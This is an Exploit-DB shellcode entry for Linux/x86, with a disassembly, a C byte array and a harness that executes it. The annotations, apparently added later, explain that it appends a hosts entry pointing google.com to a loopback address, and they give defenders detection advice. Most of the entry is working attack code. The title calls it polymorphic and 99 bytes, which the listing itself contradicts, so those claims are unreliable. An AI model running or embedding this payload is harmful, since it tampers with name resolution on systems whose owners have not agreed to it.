
Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)

14 Sep 2018 00:00:00 · Reported by Exploit-DB · Type: exploitdb · Source: www.exploit-db.com

Linux/86 File Modification Shellcode Polymorphic

Code
/* 
    # Title: Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)
    # Date: 2018-09-13
    # Author: Ray Doyle (@doylersec)
    # Tested on: Linux/x86
    # gcc -o poly_hosts_shellcode -z execstack -fno-stack-protector poly_hosts_shellcode.c
*/

/****************************************************
Disassembly of section .text:

08048060 <_start>:
 8048060:	29 c9                	sub    ecx,ecx
 8048062:	51                   	push   ecx

08048063 <open>:
 8048063:	6a 05                	push   0x5
 8048065:	58                   	pop    eax
 8048066:	68 6f 73 74 73       	push   0x7374736f
 804806b:	68 74 63 2f 68       	push   0x682f6374
 8048070:	68 2f 2f 2f 65       	push   0x652f2f2f
 8048075:	54                   	push   esp
 8048076:	5b                   	pop    ebx
 8048077:	51                   	push   ecx
 8048078:	41                   	inc    ecx
 8048079:	b5 04                	mov    ch,0x4
 804807b:	cd 80                	int    0x80
 804807d:	93                   	xchg   ebx,eax
 804807e:	6a 04                	push   0x4
 8048080:	58                   	pop    eax

08048081 <write>:
 8048081:	68 2e 63 6f 6d       	push   0x6d6f632e
 8048086:	68 6f 67 6c 65       	push   0x656c676f
 804808b:	68 31 20 67 6f       	push   0x6f672031
 8048090:	68 31 2e 31 2e       	push   0x2e312e31
 8048095:	68 31 32 37 2e       	push   0x2e373231
 804809a:	54                   	push   esp
 804809b:	59                   	pop    ecx
 804809c:	6a 14                	push   0x14
 804809e:	5a                   	pop    edx
 804809f:	cd 80                	int    0x80

080480a1 <close>:
 80480a1:	92                   	xchg   edx,eax
 80480a2:	b0 06                	mov    al,0x6
 80480a4:	cd 80                	int    0x80

080480a6 <exit>:
 80480a6:	31 c0                	xor    eax,eax
 80480a8:	40                   	inc    eax
 80480a9:	cd 80                	int    0x80
****************************************************/

#include<stdio.h>
#include<string.h>

/*
 * Raw payload bytes, split per stage to line up with the disassembly in the
 * comment above. Concatenated, the literals give the same byte sequence as a
 * single string.
 *
 * Size: 75 bytes plus the literal's implicit trailing NUL, which matches the
 * 0x8048060-0x80480aa span of the disassembly. The page title's "99 bytes"
 * does not match this listing.
 *
 * Behaviour, read from the disassembly (32-bit int 0x80 syscalls):
 *   open("///etc/hosts", 0x401)  - 0x401 is O_WRONLY|O_APPEND on Linux/x86
 *   write(fd, "127.1.1.1 google.com", 0x14)
 *   close(fd)
 *   exit(...)
 * The written text carries no newline on either side, and 127.1.1.1 lies in
 * the loopback range, so the visible effect is a hosts entry pointing
 * google.com at the local machine. The open() only succeeds when the process
 * may write /etc/hosts.
 *
 * Review notes for defenders:
 *  - The title says "polymorphic", but the listing is a fixed byte string with
 *    no decoder stub; presumably the term refers to a re-encoding of an
 *    earlier payload that this page does not show. Byte signatures are
 *    therefore a weak indicator.
 *  - The file effect is the stable indicator: file-integrity monitoring or an
 *    audit watch on writes to /etc/hosts, and review of hosts entries that map
 *    public domains to loopback addresses.
 */
unsigned char code[] =
    /* _start: zero ecx and push it as the path's NUL terminator */
    "\x29\xc9\x51"
    /* open: eax = 5 */
    "\x6a\x05\x58"
    /* path pushed in reverse order: "osts", "tc/h", "///e" */
    "\x68\x6f\x73\x74\x73"
    "\x68\x74\x63\x2f\x68"
    "\x68\x2f\x2f\x2f\x65"
    /* ebx = esp (path pointer) */
    "\x54\x5b"
    /* push 0; ecx = 0x401 (inc ecx; mov ch,0x4) */
    "\x51\x41\xb5\x04"
    /* int 0x80; fd moved into ebx */
    "\xcd\x80\x93"
    /* write: eax = 4 */
    "\x6a\x04\x58"
    /* text pushed in reverse order: ".com", "ogle", "1 go", "1.1.", "127." */
    "\x68\x2e\x63\x6f\x6d"
    "\x68\x6f\x67\x6c\x65"
    "\x68\x31\x20\x67\x6f"
    "\x68\x31\x2e\x31\x2e"
    "\x68\x31\x32\x37\x2e"
    /* ecx = esp (buffer), edx = 0x14 (length), int 0x80 */
    "\x54\x59"
    "\x6a\x14\x5a"
    "\xcd\x80"
    /* close: xchg edx,eax; al = 6; int 0x80 */
    "\x92\xb0\x06\xcd\x80"
    /* exit: eax = 1; int 0x80 */
    "\x31\xc0\x40\xcd\x80";

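/*
 * Test harness: prints the payload length, then calls the byte array `code`
 * as if it were a function.
 *
 * The header's build line passes -z execstack and -fno-stack-protector.
 *
 * Side effect: if the process is allowed to write /etc/hosts, the payload
 * appends to that file on the machine the harness runs on.
 *
 * Returns: declared int for a well-formed main, but the payload's last
 * instructions issue the exit syscall, so the call through `ret` is not
 * expected to come back.
 */
int main(void)
{
    /*
     * strlen() counts up to the first zero byte. The payload contains none,
     * so this is the full payload size. strlen() returns size_t, which needs
     * %zu (the original %d is a format/argument mismatch), and `code` is
     * unsigned char, hence the cast.
     */
    printf("Shellcode Length: %zu\n", strlen((const char *)code));

    /* Reinterpret the data array as a function pointer and jump to it. */
    int (*ret)() = (int (*)())code;
    ret();

    return 0; /* not reached when the payload runs to its exit syscall */
}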
